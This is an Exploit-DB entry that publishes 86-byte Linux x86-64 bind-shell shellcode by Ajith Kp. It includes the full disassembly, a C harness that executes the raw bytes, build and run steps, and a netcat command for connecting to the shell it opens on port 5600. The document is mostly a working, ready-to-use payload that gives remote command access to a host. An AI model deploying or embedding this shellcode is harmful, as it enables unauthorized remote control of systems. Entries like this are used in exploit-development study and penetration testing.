Linux/x64 - Bind (5600/TCP) Shell Shellcode (86 bytes)

EDB-ID:

39718

Size:

86 bytes
EDB Verified:

Author:

Ajith Kp

Type:

shellcode
Shellcode:   /  

Platform:

Linux_x86-64

Published:

2016-04-21
  
/*
---------------------------------------------------------------------------------------------------

Linux/x86_64 - bindshell (PORT: 5600) - 86 bytes

Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |

---------------------------------------------------------------------------------------------------
Disassembly of section .text:

0000000000400080 <.text>:
  400080: 48 31 c0              xor    %rax,%rax
  400083: 48 31 f6              xor    %rsi,%rsi
  400086: 99                    cltd   
  400087: 6a 29                 pushq  $0x29
  400089: 58                    pop    %rax
  40008a: ff c6                 inc    %esi
  40008c: 6a 02                 pushq  $0x2
  40008e: 5f                    pop    %rdi
  40008f: 0f 05                 syscall 
  400091: 48 97                 xchg   %rax,%rdi
  400093: 6a 02                 pushq  $0x2
  400095: 66 c7 44 24 02 15 e0  movw   $0xe015,0x2(%rsp)
  40009c: 54                    push   %rsp
  40009d: 5e                    pop    %rsi
  40009e: 52                    push   %rdx
  40009f: 6a 10                 pushq  $0x10
  4000a1: 5a                    pop    %rdx
  4000a2: 6a 31                 pushq  $0x31
  4000a4: 58                    pop    %rax
  4000a5: 0f 05                 syscall 
  4000a7: 50                    push   %rax
  4000a8: 5e                    pop    %rsi
  4000a9: 6a 32                 pushq  $0x32
  4000ab: 58                    pop    %rax
  4000ac: 0f 05                 syscall 
  4000ae: 6a 2b                 pushq  $0x2b
  4000b0: 58                    pop    %rax
  4000b1: 0f 05                 syscall 
  4000b3: 48 97                 xchg   %rax,%rdi
  4000b5: 6a 03                 pushq  $0x3
  4000b7: 5e                    pop    %rsi
  4000b8: ff ce                 dec    %esi
  4000ba: b0 21                 mov    $0x21,%al
  4000bc: 0f 05                 syscall 
  4000be: 75 f8                 jne    0x4000b8
  4000c0: 48 31 c0              xor    %rax,%rax
  4000c3: 99                    cltd   
  4000c4: 48 bb 2f 62 69 6e 2f  movabs $0x68732f2f6e69622f,%rbx
  4000cb: 2f 73 68 
  4000ce: 53                    push   %rbx
  4000cf: 54                    push   %rsp
  4000d0: 5f                    pop    %rdi
  4000d1: 6a 3b                 pushq  $0x3b
  4000d3: 58                    pop    %rax
  4000d4: 0f 05                 syscall

---------------------------------------------------------------------------------------------------

How To Run

$ gcc -o bind_shell bind_shell.c
$ execstack -s sh_shell
$ ./sh_shell

How to Connect

$ nc <HOST IP ADDRESS> 5600

Eg:

$ nc 127.0.0.1 5600

---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\x48\x31\xc0\x48\x31\xf6\x99\x6a\x29\x58\xff\xc6\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x50\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
void main(int argc, char **argv)
{
	int (*func)();
	func = (int (*)()) sh;
	(int)(*func)();
}
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services